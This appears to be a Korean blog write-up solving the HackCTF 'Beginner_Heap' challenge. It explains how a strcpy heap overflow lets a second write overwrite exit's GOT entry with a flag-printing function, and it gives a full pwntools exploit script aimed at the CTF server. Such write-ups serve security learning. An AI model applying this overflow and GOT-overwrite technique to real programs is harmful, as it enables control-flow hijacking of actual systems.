ii4gsp
HackCTF - Beginner_Heap 본문
Heap Overflow 문제이다.
파일을 다운받아 주자.
v3, v4에 각각 0x10 즉, 16byte만큼 할당되었다.
v3 + 1, v4 + 1에 8byte를 또 할당한다.
그리고 fgets()함수로 4096byte만큼 입력을받고 strcpy()함수로 v3 + 1, v4 + 1에 복사를한다.
0x400826()함수는 flag를 출력해준다.
v3 + 1에 heap overflow를 일으키고 v4 + 1에 exit의 got를 0x400826()함수로 덮어주면 된다.
Exploit
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3016)
e = ELF('/home/ii4gsp/HackCTF/beginner_heap.bin')
payload1 = ''
payload1 += '\x90' * 40
payload1 += p64(e.got['exit'])
payload2 = p64(0x400826)
r.sendline(payload1)
r.sendline(payload2)
r.interactive()소스코드를 작성해주자.
'시스템 해킹 > HackCTF' 카테고리의 다른 글
| HackCTF - Gift (0) | 2020.02.18 |
|---|---|
| HackCTF - Look at me (0) | 2020.02.17 |
| HackCTF - RTL_Core (0) | 2020.02.17 |
| HackCTF - Random Key (0) | 2020.02.16 |
| HackCTF - 1996 (0) | 2020.02.16 |
'시스템 해킹/HackCTF' Related Articles
more
Comments